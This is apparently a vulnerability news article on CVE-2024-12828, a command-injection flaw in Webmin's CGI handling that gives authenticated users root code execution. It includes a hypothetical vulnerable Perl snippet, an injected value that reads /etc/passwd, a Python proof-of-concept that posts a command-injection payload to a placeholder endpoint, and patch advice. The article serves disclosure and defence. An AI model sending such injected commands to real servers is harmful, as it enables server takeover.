CVE CyberSecurity Database News

CVE-2024-12828 - Webmin CGI Command Injection Allows Remote Code Execution (RCE) as Root

Poster -

In early 2024, security researchers uncovered a critical vulnerability in Webmin, an open-source web-based system administration tool used by millions of servers worldwide. Tracked as CVE-2024-12828 (previously ZDI-CAN-22346), this flaw affects the CGI handling component of Webmin and can allow authenticated users to remotely execute arbitrary system commands as root.

While authentication is required, the impact is severe: once credentials are obtained (even as a lower-privileged user), attackers can gain full control of the server. This article breaks down how the vulnerability works, provides an exploit example, and links to official references.

What is Webmin?

Webmin is an easy-to-use, web-based interface for system administration on Unix, Linux, and their derivatives. From adding users to configuring DNS, Webmin is used globally by admins and hosting providers.

Since Webmin runs as root and exposes a web interface, vulnerabilities here can have catastrophic consequences.

Vulnerability Details

CVE-2024-12828 exists due to improper validation of user-supplied input in certain CGI scripts. When handling requests, input is not safely sanitized before being passed to system calls or shell commands.

This flaw allows post-authentication attackers the ability to inject arbitrary OS commands that Webmin executes as root, effectively handing over full server control.

Type: Authenticated Remote Code Execution (Command Injection)

- CVE: CVE-2024-12828
- CWE: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Example Vulnerable Code (simplified)

# Hypothetical vulnerable Perl CGI code
my $user_input = param('username');
# ... later ...
system("id $user_input");

If $user_input is not sanitized, an attacker can enter bob; cat /etc/passwd as the username, causing the system to execute:

id bob; cat /etc/passwd

Proof-of-Concept Code

Here's a Python script showing, in a safe and educational way, how an attacker could exploit this flaw via a CGI request.

import requests

# Change these as needed!
TARGET = "https://victim-webmin:10000";
LOGIN_PATH = "/session_login.cgi"
VULN_CGI_PATH = "/vulnerable.cgi"
USERNAME = "demo"
PASSWORD = "demo"

# Start a session
s = requests.Session()

# 1. Log in (update form fields as your instance requires)
login_data = {
    "user": USERNAME,
    "pass": PASSWORD,
}
resp = s.post(TARGET + LOGIN_PATH, data=login_data, verify=False)

# 2. Send exploit
cmd = "id; whoami; uname -a"
payload = f"legituser;{cmd};"   # inject after username
exploit_data = {
    "username": payload,
}
exploit_resp = s.post(TARGET + VULN_CGI_PATH, data=exploit_data, verify=False)

print("Exploit response:")
print(exploit_resp.text)

All Webmin administrators should

- Patch immediately: Upgrade to Webmin 2.102 or later.

References

- Original CVE: NVD - CVE-2024-12828
- Webmin Release Notes: Webmin 2.102 - GitHub
- ZDI Advisory: ZDI-24-322 (ZDI-CAN-22346)
- Similar Issue: CWE-78, OS Command Injection

Summary

CVE-2024-12828 is a dangerous Webmin flaw putting countless servers at risk. Authenticated attackers can take over the server by injecting commands into CGI scripts. Patch now and limit Webmin access to stay safe.

For administrators everywhere: never delay critical security fixes, and always watch for suspicious web requests in your admin panels.

Timeline

Published on: 12/30/2024 17:15:07 UTC